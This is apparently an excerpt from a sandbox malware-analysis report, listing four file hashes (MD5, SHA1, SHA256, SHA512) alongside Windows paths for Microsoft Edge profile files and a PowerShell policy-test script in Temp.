MD5 23f6da965903d3e807f5df2b94357260
SHA1 2642744ac41f1b5b9c006cbfe761fbb36c095a13
SHA256 f5a337e0d289485143b81b583542a9f71c44a9ea95dfc8442be3297ee914a5f3
SHA512 4dd593ca6e17680014e0aabf75b639e750dcec66f0b7efb75603ef45be28d41ce126b88ee3fd18370612f9fbff7745eb3a6ff8bc7bfff59ed3ef595c0940bbc1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1a3c3d88680d0a84e63180635757fd6d
SHA1 aa37555cca7b148f4f06102ab09d220b025d90b1
SHA256 d0975419c91daf2eca2c8df119dba3d734f3d17043d8f9c7451c179cfa0fcfce
SHA512 0fc193419979f46a2794409ae434a8d41cd824b1567b8b9e613ac04b977b911dff07ed1f298d233461b5ad9cb5674c14f40ef9cbf86084194f6ea8bf4a9ea3c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ef2ugyto.hnf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
